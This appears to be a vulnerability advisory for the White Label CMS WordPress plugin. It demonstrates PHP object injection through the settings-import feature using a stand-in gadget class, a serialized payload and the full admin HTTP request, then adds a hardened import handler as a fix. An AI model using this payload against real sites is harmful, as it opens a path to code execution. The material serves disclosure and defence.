## https://sploitus.com/exploit?id=WPEX-ID:B7707A15-0987-4051-A8AC-7BE2424BCB01
To simulate a gadget chain, put the following code in a plugin (any active plugin file will do; the class only needs to be loaded when the import runs):

```php
<?php
// Stand-in gadget: if the plugin's import feature unserialize()s attacker-controlled
// data, PHP instantiates this class and calls __wakeup(), which stops the request
// with a recognisable message.
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}
```

Then create a file named `import.txt` with the following content: `O:4:"Evil":0:{};`

And import the file via the "Import Settings" feature in Settings > White Label CMS (requires the White Label CMS plugin to be active).

Then view the response to the import request, which will contain the "Arbitrary deserialization" message. The request looks like this:

```http
POST /wp-admin/options-general.php?page=wlcms-plugin.php&view=settings HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/options-general.php?page=wlcms-plugin.php
Content-Type: multipart/form-data; boundary=---------------------------3253008022193750493240374932
Content-Length: 669
Origin: http://localhost:8888
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings_nonce"

d8d0333b92
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/options-general.php?page=wlcms-plugin.php
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings"

Save
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="import_file"; filename="import.txt"
Content-Type: text/plain

O:4:"Evil":0:{};

-----------------------------3253008022193750493240374932--
```
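The plugin-side mitigation, as an added example that is not the White Label CMS plugin's own code: the advisory shows that the uploaded file reaches `unserialize()` with object tokens intact, so the import handler below decodes the file with `allowed_classes => false` (available since PHP 7.0), which turns any `O:` token into a `__PHP_Incomplete_Class` instead of instantiating the class, so no `__wakeup()` or `__destruct()` gadget can execute. It then rejects anything that is not a plain array of settings. The function name `wlcms_safe_import` and the sample settings keys are hypothetical; the two inputs are constructed for the demonstration.

```php
<?php
// Added example (not the plugin's code): a settings-import handler hardened
// against PHP object injection. It assumes the original handler passed the raw
// uploaded file to unserialize(); the function and key names are hypothetical.

/**
 * Decode an uploaded settings export without ever instantiating objects.
 * Returns the settings array on success, or null if the payload is rejected.
 */
function wlcms_safe_import(string $raw): ?array {
    // allowed_classes => false makes every object in the stream a
    // __PHP_Incomplete_Class, so magic methods of arbitrary classes never run.
    // The @ hides the "extra data" notice PHP 8.3+ raises for trailing bytes
    // such as the ';' in the advisory's payload.
    $data = @unserialize($raw, ['allowed_classes' => false]);

    // unserialize() returns false on malformed input; a real export is an array.
    if (!is_array($data)) {
        return null;
    }

    // Refuse any nested object that survived decoding, so an O:... token buried
    // inside an array can never be stored and re-unserialized later.
    $contains_object = false;
    array_walk_recursive($data, function ($value) use (&$contains_object) {
        if (is_object($value)) {
            $contains_object = true;
        }
    });

    return $contains_object ? null : $data;
}

// Constructed inputs: a legitimate export and the advisory's proof-of-concept payload.
$legit   = serialize(['hide_wp_logo' => true, 'login_logo' => 'https://example.invalid/logo.png']);
$payload = 'O:4:"Evil":0:{};';

echo "legitimate export: " . (wlcms_safe_import($legit) !== null ? "accepted" : "rejected") . "\n";
echo "object payload:    " . (wlcms_safe_import($payload) === null ? "rejected" : "accepted") . "\n";
```

Running this with the `Evil` class from the advisory loaded shows that the payload is rejected without the "Arbitrary deserialization" message ever appearing, because the class is never instantiated. The more durable design is to export and import settings as JSON (`json_decode($raw, true)`), which has no object-instantiation semantics at all; the `allowed_classes` guard is the minimal change when the serialized format must be kept for backward compatibility with existing export files.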